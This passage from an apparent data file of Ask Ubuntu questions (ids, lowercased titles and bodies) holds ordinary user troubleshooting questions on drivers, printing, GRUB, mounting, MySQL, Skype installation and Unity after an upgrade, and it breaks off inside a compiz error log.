//ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main
330538	mu ubuntu stuck at installing vmware tools . please wait	i have installed ubuntu desktop on vmware player 5.0.2 on windows 7 64bit os . after installing vmware tools on the desktop it always stops and giving installing vmware tools . please wait . its a continuous process and not showing gui or command line either . . any help will be appriciated..i can not upload images here ...
330541	what is vmlinuz.efi ?	yes , i know it 's a kernel ; ) i saw this file when i was looking through the 64-bit iso 's of 13.04 . i 'm working on remixing them onto my flash drive . however , i want my remix to have an updated kernel compared to that of the cd . this means that i will have to make a vmlinux.efi . of course , to be able to make one means i have to know what it is . is it simply a plain old 64-bit kernel ? is it , perhaps , an efi boot stub ? the boot stub aspect does n't make sense because it 's loaded from grub in efi , and is n't even located in efi/boot . maybe it 's just future-proofing if it is an efi boot stub ? an article i found on the community wiki said something along the lines of `` it 's called vmlinuz.efi '' because it 's 64-bit . that , too , seem a little weird . i mean , it helps to differentiate but a better name could have been chosen if it 's not efi bootable . one thing that i find odd is that isolinux and grub both load it in the same way as if it were just a kernel ... so its actual purpose is a little mysterious . can efi boot stubs be loaded as normal kernels as well ? well , the fact of the matter is that i can find no discussion about why this filename was chosen and what exactly it is . so , here 's hoping that someone here knows what this is and how it works . edit : info/md5 's of all kernels from ubuntu , kubuntu , xubuntu , and lubuntu cd 's : distro : lubuntu vmlinuz : linux kernel x86 boot executable bzimage , version 3.8.0-19-generic ( buildd @ allspice ) # 29-ubuntu smp wed apr 17 18 , ro-rootfs , swap_dev 0x5 , normal vga deacc3c3a21beb4913c43a00bb6d5e01 vmlinuz distro : kubuntu vmlinuz : linux kernel x86 boot executable bzimage , version 3.8.0-19-generic ( buildd @ allspice ) # 29-ubuntu smp wed apr 17 18 , ro-rootfs , swap_dev 0x5 , normal vga deacc3c3a21beb4913c43a00bb6d5e01 vmlinuz distro : xubuntu vmlinuz : linux kernel x86 boot executable bzimage , version 3.8.0-19-generic ( buildd @ allspice ) # 29-ubuntu smp wed apr 17 18 , ro-rootfs , swap_dev 0x5 , normal vga deacc3c3a21beb4913c43a00bb6d5e01 vmlinuz distro : ubuntu vmlinuz.efi : linux kernel x86 boot executable bzimage , version 3.8.0-19-generic ( buildd @ allspice ) # 29-ubuntu smp wed apr 17 18 , ro-rootfs , swap_dev 0x5 , normal vga 1919b5acd184538ecb978f6361f98bf1 vmlinuz.efi the one from the ubuntu iso is clearly different . i 'm beginning to think it must be an efi boot stub kernel ... but still have n't found anything to confirm or deny it .
330543	opengl runs on very low framerate with a intel graphic card	i got two systems which are almost identical but with slightly different graphic cards : system a product : n10 family integrated graphics controller vendor : intel corporation driver : i915 system b product : atom processor d2xxx/n2xxx integrated graphics controller vendor : intel corporation driver : gma500 i know that both are not known to give the best performance , but system b is very slow . here are the main differences : results of glmark2 : system a : ( score 55 ) gl_vendor : intel open source technology center gl_renderer : mesa dri intel ( r ) igd x86/mmx/sse2 gl_version : 1.4 mesa 9.0.3 system b : ( score 24 ) gl_vendor : vmware , inc. gl_renderer : gallium 0.4 on llvmpipe ( llvm 0x301 ) gl_version : 2.1 mesa 9.0.3 results of glxinfo | grep render : system a : direct rendering : yes opengl renderer string : mesa dri intel ( r ) igd x86/mmx/sse2 system b : direct rendering : yes opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) results of grep -i chipset /var/log/xorg.0.log : system a : [ 21.507 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , [ 21.510 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 21.521 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) pineview g system b : [ 16.728 ] ( ii ) vesa : driver for vesa chipsets : vesa results of egrep `` ( glx|dri ) '' /var/log/xorg.0.log : system a : [ 21.319 ] initializing built-in extension xfree86-dri [ 21.319 ] initializing built-in extension dri2 [ 21.418 ] ( == ) aiglx enabled [ 21.419 ] loading extension glx [ 22.114 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 22.114 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i915 [ 22.140 ] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 22.417 ] ( ii ) aiglx : enabled glx_mesa_copy_sub_buffer [ 22.417 ] ( ii ) aiglx : enabled glx_intel_swap_event [ 22.417 ] ( ii ) aiglx : enabled glx_arb_create_context [ 22.417 ] ( ii ) aiglx : enabled glx_arb_create_context_profile [ 22.417 ] ( ii ) aiglx : enabled glx_ext_create_context_es2_profile [ 22.417 ] ( ii ) aiglx : enabled glx_sgi_swap_control and glx_mesa_swap_control [ 22.417 ] ( ii ) aiglx : glx_ext_texture_from_pixmap backed by buffer objects [ 22.417 ] ( ii ) aiglx : loaded and initialized i915 [ 22.417 ] ( ii ) glx : initialized dri2 gl provider for screen 0 system b : [ 16.696 ] initializing built-in extension xfree86-dri [ 16.696 ] initializing built-in extension dri2 [ 16.725 ] ( == ) aiglx enabled [ 16.725 ] loading extension glx [ 18.120 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 18.120 ] ( ii ) aiglx : screen 0 is not dri capable [ 18.144 ] ( ii ) aiglx : loaded and initialized swrast [ 18.144 ] ( ii ) glx : initialized driswrast gl provider for screen 0 the last one is especially interesting since system b is obviously failing to initialize proper dri support . all this tells me that there is something missing on b. i do n't think that all these differences are simply caused by using two different graphics cards so i suspect that i need to install some other driver on b . maybe the one which is used by system a ( i915 ) ?
330544	why is the hid_max_usages value so low in kernel ?	i was wondering why the hid_max_usages value was still less than 13k , when most gaming mices need 32k or 64k . values are found in include/linux/hid.h from the kernel sources , and this is still affecting kernels up to 3.10.5 does canonical have a good reason not to use 64.000 as a value for hid_max_usages in their kernels ?
330546	localhost printer stuck at `` rendering completed ''	i am unable to print documents using my hp printer . however , i am able to print test pages . what i tried : i have tried removing and re-installing the printer from the system settings but i can only print once ( the first task ) . then all the following tasks get stuck at the `` rendering completed '' status . i additionally tried restarting the computer which leads in the same task mentioned above . moreover , i logged into the cups system ( 1.6.2 ) from http : //localhost:631 from there , i removed the printer , restarted it and re-installed with no sucess . system specifications : system : ubuntu gnome 13.04 memory : 3.9 gb cpu : amd athlon ( tm ) 64 x2 dual core processor 4200+ ă 2 os-type : 32 bit graphics : gallium 0.4 on nva3 printer : hp deskjet 2050 j510 series ip adress : localhost i had no problems with my previous os which was pinguy os 11.04 ( a distro based on ubuntu 11.04 ) and it 's the first time i use my printer at this os . screenshots : my printer stuck at `` rendering completed '' status . from the cups web interface ; you can see that `` rendering completed '' is stuck at the state of the print process . *edit : *i tried printing from the pdf.js pdf viewer of firefox : i wait for about 5 minutes for a 10 pages document to print , the document is printed like faded and sort of in bold font ( i accuse rendering for that ) . then the status of the printer gets stuck at 'rendering completed ' but i can print later on . again , for the next prints i wait for 5 minutes minimum ( i wait for the 'rendering ... . ' bar to fill ) and the printing is weird .
330547	need to replace space with & nbsp ;	i 'm trying to replace all spaces in a text with the html space . cat test.txt | sed -e 's/ / & nbsp ; /g' but it returs without the & sign . this nbsp ; is nbsp ; a nbsp ; sample nbsp ; text . how do i make this right ?
330549	how to backup the data which ca n't be accessible ?	my ubuntu 12.04 desktop does n't boot , so i am trying to get my data from the old ubuntu using live usb ( running ubuntu from the usb without installing ) . but when i try to copy some files i get error as `` you have no permission to access this '' . so what is the way that i have to handle to backup my data .
330556	endless swap operation slows computer to a halt . how to fix ?	every so often -- usually when i have lots of programs open -- my laptop starts doing what i think is an endless swap operation . the hard drive writes and reads like crazy , and the mouse stops being responsive . when i try to see what process is causing this , i press ctrl+alt+f1 to get a terminal , but i ca n't even log in because the operation is taking up all system resources , and letters appear several seconds , or even minutes , after i press the keys . usually i have to hard-reboot the computer , which i know is bad for the hd , since it 's spinning like crazy when i power it down . so i ca n't identify what process is causing this , because i ca n't even open a terminal to run top when it happens . i have 2g of memory , and a 5g swap partition . what could be causing this , and how do i fix it ?
330558	error installing apache2.2-common	i 'm having an inssue installing apache2.2-common . the actual issue is installing libapache2-mod-mono , but that errors with the apache2.2-common dependency . here 's the error message . any idea what i can do to get this installed ? i 'm running linux mint 13 . $ sudo apt-get install apache2.2-common reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2 : depends : apache2-data ( = 2.4.6-2~precise+1 ) but it is not going to be installed conflicts : apache2.2-common but 2.2.22-1ubuntu1.4 is to be installed apache2-bin : conflicts : apache2.2-common but 2.2.22-1ubuntu1.4 is to be installed apache2.2-common : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.4 ) but 2.4.6-2~precise+1 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . update : a little more info : i uninstalled a bunch of stuff and started from scratch . now when i try to install apache2.2-common i get just one error : the following packages have unmet depenecies : apache2.2-common : depends : apache2.2-bin ( =2.2.22-1ubuntu1.4 ) but it is not going to be installed . e : unable to correct problems you have held broken packages .
330559	.sh file is not running changing directory command	my contents of .sh file are sudo -i cd /home/madhu131313/documents/ i run it , then it asked for root password , it changed to root , but it does n't execute the changing directory
330563	what are the precautions/steps that i must take to install ubuntu on a freedos laptop ?	i am buying a lenovo g500s laptop with freedos ( i opted for it ) . i want to install ubuntu on it . will there be any problem in this case ? my laptop configuration is intel core i5 3rd generation processor , 8gb ram , 2gb nvidia geforce graphics , 500gb hard disk .
330568	how to restore photos on sd card	i deleted 40 some photos from my sd card in my camera . i thought i saved them on my desktop . using 12.04 lts . is there a way to restore the photos ? ? my wife is pissed . nothing has been over written on the card . thanks
330569	can the folder have no name in ubuntu ?	i have a folder in my system with no name in it . it is empty . but that folder has files inside it . just out of curiosity , i tried to create another folder and try to rename it by not giving any name . but i could not do it . any idea , how can it be achieved ? on the same topic , how to access that folder in the shell ?
330575	why there is no clear instruction for how to mount a network drive ?	i do n't know how many post i read already and ca n't believe its so tricky . ok let me be specific : i run a ubuntu 13.10 desktop and want some shares on my nas ( qnap fw3.8.2 ) to be automatically mounted . so far i use the nautilus bookmark function but ... as the user accounts on both machines using the same account name plus password i tried to edit /etc/fstab as follows 192.168.1.9/qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 192.168.1.9/*q*download /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 192.168.1.9* : */qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 192.168.1.9* : */qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 */*192.168.1.9/qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 */*192.168.1.9/qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 *//*192.168.1.9/qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 *//*192.168.1.9/qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 *//*192.168.1.9 : /qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 *//*192.168.1.9* : */qdownload /mnt/nas auto user , uid=1000 , rw , suid , credentials=/etc/credentials 0 0 and may be more . i always get `` special device //192.168.1.9/qdownload '' ( or its variations ) does not exist . does anyone of you guys sense what the problem is ?
330577	gedit - background mouse wheel	i 'm encountering a problem on all my ubuntu & mint installs : when i have a file opened with gedit and scroll the mouse wheel into another application , gedit gets scrolled too . how to reproduce : open a big text file with gedit ( lets say > 500 lines ) alt tab on firefox scroll down several times on a big page alt tab on gedit scroll one time ( top or bottom ) gedit seems to take the previous scrolls into account . how to fix this ?
330579	12.04 - mysql wo n't start by using service mysql start	the only way i was able to get mysql to start was to issue : mysqld when i issued this command , it started rolling back some database transactions that were conflicted . i have tried issuing service mysql stop and all i get is unknown instance : the output of 'ls -l /etc/init.d/mysql ' is : lrwxrwxrwx 1 root root 21 apr 9 03:45 /etc/init.d/mysql - > /lib/init/upstart-job the output of cat /etc/init/mysql.conf is : # mysql service description `` mysql server '' author `` mario limonciello < superm1 @ ubuntu.com > '' start on runlevel [ 2345 ] stop on starting rc runlevel= [ 016 ] respawn respawn limit 2 5 env home=/etc/mysql umask 007 # the default of 5 seconds is too low for mysql which needs to flush buffers kill timeout 300 pre-start script # sanity checks [ -r $ home/my.cnf ] [ -d /var/run/mysqld ] || install -m 755 -o mysql -g root -d /var/run/mysqld /lib/init/apparmor-profile-load usr.sbin.mysqld lc_all=c blocksize= df -- portability /var/lib/mysql/ . | tail -n 1 | awk ' { exit ( $ 4 < 4096 ) } ' end script exec /usr/sbin/mysqld post-start script for i in `seq 1 30` ; do /usr/bin/mysqladmin -- defaults-file= '' $ { home } '' /debian.cnf ping & & { exec `` $ { home } '' /debian-start # should not reach this line exit 2 } statusnow=`status` if echo $ statusnow | grep -q 'stop/ ' ; then exit 0 elif echo $ statusnow | grep -q 'respawn/ ' ; then exit 1 fi sleep 1 done exit 1 end script now when i try to upload anything to wordpress i get a http 500 error . i am assuming this is because mysql is running under a different user . any thoughts on how to get this working again ? was suggested to post here from this post in stackoverflow
330580	i ca n't seem to close byobu splits using alt f5	i am using byobu with tmux and i am trying to collapse the 4 splits i have on the window , but it is not responsive . when i press alt+f5 nothing happens . how do i collapse the splits in this situation ?
330581	middle-click and drag does n't trigger auto scrolling	i 've just came from a windows system ( in fact , i 'm dual booting ubuntu 12.04 and win7 ) , and in my firefox installation back then , when i pressed the middle mouse button ( mouse wheel ) , it displayed a circle that i could move the pointer away from to navigate around the page in a 2-dimensional scrolling . in ubuntu 's firefox , i do n't see this behaviour . is there a way to enable this feature ? i beleive it would require a different version of firefox , because when i search middle in about : config , ot only has middlemouse.scrollbarposition ; true middlemouse.paste ; true middlemouse.opennewwindow ; true middlemouse.contentloadurl browser.tabs.opentabfor.middleclick ; true i 'm using the canonical release 23.0 , by the way . edit : downloaded a clean install from firefox.com and nothing changed . maybe it 's a system bug ?
330583	unable to install skype in ubunutu 12.04	i downloaded skype for ubuntu from here . i tried to install it with the command sudo dpkg -i skype-ubuntu-precise_4.2.0.11-1_i386.deb but the installation failed . the following lines were displayed in the terminal : dineshkumar @ dineshkumar-desktop : ~/downloads $ sudo dpkg -i skype-ubuntu-precise_4.2.0.11-1_i386.deb selecting previously unselected package skype . ( reading database ... 169017 files and directories currently installed . ) unpacking skype ( from skype-ubuntu-precise_4.2.0.11-1_i386.deb ) ... dpkg : dependency problems prevent configuration of skype : skype depends on libqtwebkit4 ( > = 2.2~2011week36 ) ; however : package libqtwebkit4 is not installed . skype depends on libxss1 ; however : package libxss1 is not installed . dpkg : error processing skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : skype why did the installation fail and how could i install skype from the .deb file that i have ? i checked the question here but found it of no use . the problem being discussed there was about skype malfunctioning after an update . but in my case , i could n't even install skype properly .
330584	cursor moves randomly	i noticed that after a 1-hour ( or longer ) session , if i lock/suspend my laptop , when i start that session again , my cursor moves randomly and sometimes clicks as well . this does not happen on windows ( i have both windows 7 and ubuntu 13.04 ) , so i know that it is not a hardware issue . it also happens when i use a usb mouse . i can fix it temporarily by turning my laptop off and booting in ubuntu again , but this becomes tedious , especially because it 's hard for me to shutdown while the cursor is n't completely in my control . is there a way to fix this ? i just noticed that even after restarting my laptop , the cursor continues to move on its own . it 's also not only my account ; in the guest account and the login page itself , this continues to happen . when i type in xinput in the terminal , my mouse/touchpad/n-trig touchscreen are : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ dell dell usb optical mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ n-trig touchscreen id=14 [ slave pointer ( 2 ) ] ⎜ ↳ n-trig pen stylus id=15 [ slave pointer ( 2 ) ] ⎜ ↳ n-trig multitouch id=16 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=18 [ slave pointer ( 2 ) ]
330585	how get join.me in ubuntu ?	i 'd like to know if there 's any way of getting join.me to work in ubuntu ? i 'm not looking for a similar software . i need it to be join.me .
330586	custom install of php	i have always used the code below to install my php environment : sudo apt-get install -qqy php5 sqlite php5-gd php5-sqlite libapache2-mod-php5 libapache2-mod-auth-mysql php5-mysql php5-intl php5-curl however i can no longer do this as the latest version of php in ubuntu 13.04 is php 5.4.9 . this version has the known bug # 63379 that basically destroys the logout handler from the symfony security component . i know i 've got two options : install via adding a custom ppa ( this post has all the details on that : how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ? ) or via script . seeing as this is needed for a server that my company uses i simply wo n't be prepared to add these private ppas due to security risks . but rather i would like to create a script to install any version of php and the above packages ( sqlite , curl , etc ) i normally install in one easy step via apt-get install . does anybody have a custom script that covers all the above mentioned packages ? also is there anything else i should watch out for via the script method for installing php ?
330587	lubuntu : .desktop shortcut works on the desktop , but does n't from the menu	i 've created a simple shortcut.desktop in my lubuntu 13.04 /usr/share/applications : [ desktop entry ] type=application name=shockwave icon=/home/zane/pictures/evil decepticons.png exec=/home/zane/documents/zane_shockwave-rdp.sh terminal=true mimetype=text/plain categories=gtk ; webbrowser ; network the pointed sh contains just echo `` it works '' . if i double-click the .desktop it directly , the script runs and everything works as expected . but if i click the menu entry from the desktop , i just get a `` stuck '' , non-inputable terminal . note : to workaround this bug https : //bugs.launchpad.net/ubuntu/+source/pcmanfm/+bug/975152/comments/14 i 've just `` lxterminal '' under pcmanfm - > prefernces - > advanced , otherwise i ca n't run .sh at all . any ideas ? edit i also tried these variant , but i always get the same result : exec=sh /home/zane/documents/zane_shockwave-rdp.sh exec=lxterminal /home/zane/documents/zane_shockwave-rdp.sh
330589	how to compile and install dnscrypt	apparently there are no .deb packages available for installing dnscrypt . so i am forced to compile and install . i downloaded the package from here http : //download.dnscrypt.org/dnscrypt-proxy/ followed the instructions from here http : //dnscrypt.org/ after extracting , i cd into directory , ./configure and then when i type make i get : no targets specified and no make file found . what is going on ? how do i get dnscrypt installed ?
330591	customize in libre office 4.1 on ubuntu 13.04	i am running libre office 4.1 on ubuntu 13.04 and i would like to make some macros to automate some monotonous tasks . however when i go to the tools drop down menu and select customize nothing happens . also when i mouse over organize macros the macro selector pops up ( without clicking on it ) but there is no new macro option any help to solve this problem would be greatly appreciated
330593	browser is not displaying the php output	i have installed lamp over ubuntu 12.4 . i am able to work with mysql through command prompt and user interface , but when i try to execute the php script which include html and mysql statements , the browser is not displaying the script output and no errors are shown . please , if you can , help me with a solution . thanking you all in advance ...
330594	configuration tmuxinator	i am a user of zsh and tmux . i discovered tmuxinator for configuration scripts to manage sessions , and it 's awesome . but i have a problem on a machine , here is my yaml file tmuxinator : name : admin root : ~/ tmux_options : -v -2 # pass arguments to tmux windows : - mail : panes : - mutt - # empty , will just run plain bash - shell : ls then the generated script . i do n't know why .
330599	replicate 2 ubuntu servers one local and one remote	here is the situation . i have a local webserver and a remote webserver . both will be identical except that one is on vmware and one is a hosted web server . i want to replicate everything installed on the local server ( settings , applications- mysql , apache , the cron jobs , and all the data and files - php ) to be on the live hosted web server . so that everything is identical and functions exactly the same . i know i will probably have to do some changes of setting once it is live , for it to run correctly , but is there an easy and relatively fast way to do this ? i am new at this and never done this before . will i have to setup the server from scratch or can i clone or copy everything to the new server ?
330601	acer aspire 5252 - hdmi not working	good day , i have a burning question that after many months of searching and trying which lead to no success , in fact i had to switch back to windows ( i hate myself ) because of this problem . when i attempt to use my hdmi connection to a tv , i can not get any sound , an image will display but no sound . i have tired unmuteing , playing with alsamixer ( which did not even have the hdmi sound listed ) , installed amd cataylst 12 legacy and 13 legacy . i have also tried the hdmi -0 option in grub . system specs ; *aspire 5252 ( x64 ) *amd v1600 processor *ati mobility radeon hd 4200 ** i used ubuntu 12.04 lts , 12.10 , 13.04 . i would love to know how to get hdmi audio working . thanks in advanced
330603	successfully installed ubunut 12 but i never saw the windows outlined by this walkthrough	http : //www.ubuntu.com/download/desktop/install-desktop-long-term-support i was never given an option to install over windows and wipe it out . how do i do that ? i am running a new dell xps with windows 7 premium . thank you .
330607	ubuntu keeps resetting time to -3 hours	i have a dual boot system with win 7 / ubuntu 13.04 . for some reason , ubuntu resets the system time to -3 hours regardless of timezone settings . i thought that this was utc problem , but the problem persists regardless of what is set in /etc/default/rcs . # assume that the bios clock is set to utc time ( recommended ) utc=no if i check the timezone with date + % z it states utc however , when using the graphical user interface to check the timezone it shows that i 'm in the right timezone . date gives me pe 9.8.2013 13.51.52 +0000 while hwclock is the correct time pe 9. elokuuta 2013 16.52.03 -0.516733 sekuntia ubuntu seems to set the bios time to wrong time . this happens on every boot , even after i 've manually changed the time . windows 7 does not have this problem . i could not find duplicates or solutions beyond the utc settings . the system is set to manual time and is not updating it from the internet . i 've already tried that but it seems that it never updates so i 'm stuck in the wrong time .
330610	installing elantech drivers for ubuntu 13.04	my elantech touchpad is really jerky . xinput shows that synaptic drivers are installed ? ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ elan touchscreen id=8 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ sleep button id=7 [ slave keyboard ( 3 ) ] ↳ hd webcam id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys how can i load elantech drivers instead ?
330614	does notepad++ work on ubuntu ?	i have notepad++ on windows and i am about to download ubuntu but i am wondering if there 's a special version for ubuntu or can i just use the one i have now . if it there 's no version for ubuntu , can anybody please recommend a similar program ? by the way sorry for the tags . i need more reputation to create a new tag , that 's the closest i could i get
330617	keepassx auto-type in no longer operational	in keepassx the auto-type feature was working fine , until few days ago when it stopped . i download a lot of libraries and programs and delete them , so most likely something affected it and when i tried to remove and then reinstall it , it would n't . has anyone experienced this problem ? i use ubuntu 13.04 x86_64 i do n't have the reputation to make a new tag , so i used an existing one despite the fact it is not what i want
330619	bash script to start 'motion ' on screen lock	i wish to write a bash script that executes on start up ubuntu 13.04 and starts motion whenever the screen is locked . being a novice at bash scripting , i was n't able to understand the various help sources available on the web and thereby write a script on my own . anyways , i know that the following command is used to check if the system is locked : gnome-screensaver-command -q | grep `` is active '' but , if i use this command , i will have to periodically ( say every 5-10 seconds ) check the lock status . is there a better alternative ? could someone provide me with a skeleton of the script ? so i could write the following script which starts the webcam once i lock the screen but does not stop it once sign back in . any suggestions ? # ! /bin/bash while : do sleep 2 if ( gnome-screensaver-command -q | grep `` is active '' ) ; then motion 2 > ~/.motion/log elif ( gnome-screensaver-command -q | grep `` is inactive '' ) ; then /etc/init.d/motion stop 1 > /dev/null fi done
330622	unable to use mount -rw	i forgot my password to the root account , i have autologin enabled so i can use it , but unable to make changes in it . after searching and searching i found a `` solution '' which does not work for me at all . i open `` advanced settings for ubuntu '' and choosed ubuntu with linux generic 3.8 ( recovery mode ) , choosed root , and entered mount -rw -o remount / but it does n't work , it shows `` help '' about mount ( mount -- make ; -o [ options ] [ passwdfd ] and so on ) , but not what it was supposed to do . tried again and again but still nothing . i get the manipulation token error if i try to ignore the mount stuff . has anyone any advice or suggestions on how to fix this , please ?
330623	is it possible to display windows which are bigger than monitor resolution ?	i want test my game for retina displays , which has 2048ă1536 resulution , but my monitor small and i do n't see the whole window . is it possible make this window smaller and save 2048x1536 resolution of game ?
330624	file permissions using wine over network	i 'm using wine to access a program file through the network . when i start the program from the desktop icon , i get this message ... codebase error error # 1 : -61 error # 2 : 90615 permissions error opening file file4open m : \mcmsystd\company.dbf i have located all the company.dbf files and they all say i have read/write permissions . the next error reads this , as there is always three together with this error . codebase error error # : -935 error # : 92409 null input parameter unexpected d4tagselect error exiting application if anyone has any idea how to fix this , please can you let me know ?
330630	stuck on grub screen ubuntu 12.04	i installed ubuntu 12.04 alongside with windows 8 . after installing i restarted computer and i found my self stuck on grub screen ( i dont know what to call that ) . so i press power button and restarted my computer and it booted windows 8 without any os selection menu . so in order to get ubuntu in os selection menu i used easybcd , and added linux os in menu with grub2 selected in kernel selection . now again from os selection menu when i choose ubuntu i find myself on grub4dos screen . can somebody help me please ? ps : on my system windows 8 was not preloaded i have installed it . this is the grub screen on which i am stuck after trying to boot in the ubuntu .
330639	is it possible to move the top activities bar of gnome shell to the bottom of the screen ?	i have set up a normal user account in my computer as a guest account , which lots of my friends use . i love the gnome shell , and i set it as the desktop environment . the problem users of my computer usually encounter , even when `` activities '' is shown at the upper left of the screen , is that they keep looking ( and moving the mouse cursor ) to the lower left of the screen . ( is this windows ' fault ? ) well , it is because that 's what they are familiar with . i know of other de 's that has the windows lower left apps-button orientation . but i still love gnome shell . so , is the question above . thank you . ( and i think it would still be quite useful even if the bottom bar remains just there . i 'm on 12.04 , so that could mean , lower left hot corner = activities/windows , lower right hot corner = bottom bar . not bad . ) ps . i 've tried flippery bottom panel , and it does n't really do what i exactly wanted .
330640	adding an entry to grub ?	i have ubuntu 13.04 installed by side of windows 7 . windows 7 is installed on sda7 . but due to one reason or another it does n't show up in the grub menu . so please help me out in adding it . i 've seen lots of tutorials online . i tried boot repair but none of them seemed to work . thanks .
330641	big snapshot of small portion of screen ?	i know about taking snapshot using prtsc button , also its usage with shift to take snaps of a rectangle drawn over area of interest but in such a case the image created remains exactly of the size of the rectangle drawn . consider the case of taking a snap of terminal output of a command . such an image remains very small and hard to see . how can i take snap of small portion of a window but create a big image ? this is the snap i caught using shift + prtsc
330642	how to install the driver for iball 3.5g connect in ubuntu 12.04 ?	how do i install the driver for iball 3.5g connect wireless modem in ubuntu 12.04 ? my laptop is dell inspiron n4010 . modem is not getting detected .
330643	ubuntu taking to long to download ?	i 've started the installation of ubuntu , and after clicking on 'install ubuntu ' it boots to window and asks me to choose a username , password , disk size , etc . it then brings me to a screen that says it will take ubuntu 50hrs to download ! ! please help me i do n't want to wait so long !
330645	mount external harddrive and one of its subfolders from fstab	i 'm currently mounting my external harddrive using the following entry in /etc/fstab : uuid=12c23ad8c23ac031 /media/mybook ntfs-3g auto , users , exec , rw , nobootwait , iocharset=utf8 , uid=1000 , gid=1000 0 0 in addition to that , i also need to run mount as follows ( which i currently only do before starting steam , but it 's getting annoying to constantly do so ; i would prefer it was automated ) : sudo mount -- rbind /media/mybook/games/steamdata /home/andreas/.local/share/steam/ is there any way to automatically mount the steamdata folder whenever the drive `` my book '' is mounted ? there are answers on how to run a shell script when a drive is mounted , but is it better/possible to do this directly from fstab ? note that my external harddrive may not be available at boot , and may be plugged in at a later time .
330646	sad owners of ipod nano and ipod shuffle need help	we got rid of dual boot , as windows is rubbish , and it is easier to just use all our hard drive on one os . i have used ubuntu for a long time and have 12.04 version . love it to bits , but the only problem is when we want to put different music on ipod products . use rhythmbox , but that does n't work , it just seems to remove all the music . is there a stripped down itunes for linux that means i can just drag and drop and not have any problems ? i imagine not , but is there just a basic way to do it ? i would just buy new music players but do n't have the money for such luxuries at the moment .
330649	no display variable , unity not working , just upgraded to 13.04 , have amd drivers	i just upgraded from 12.10 to 13.04 , and now my gui / unity is not working . i get a login screen that looks fine , but when i log in , there are no menus or bars or anything , and all the tiles look grey and blocky . i also ca n't move windows , even though i can open them ( opening a terminal ) . i have gnome and standard ubuntu unity installed . gnome seems to almost work , but is missing all the menus , and unity gives me a blank desktop with unmoveable windows . neither have any menus . i 've tried a few things , and i 'll show all the output below . i 'm also copying the output from ( 1 ) ccsm - does n't work , gives a gtk error for not being able to open a display . output : /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file `` /usr/bin/ccsm '' , line 94 , in < module > import ccm file `` /usr/lib/python2.7/dist-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file `` /usr/lib/python2.7/dist-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file `` /usr/lib/python2.7/dist-packages/ccm/constants.py '' , line 30 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' ( 2 ) echo $ display output is nothing . ( 3 ) unity output is : warning : no display variable set , setting it to :0 compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a 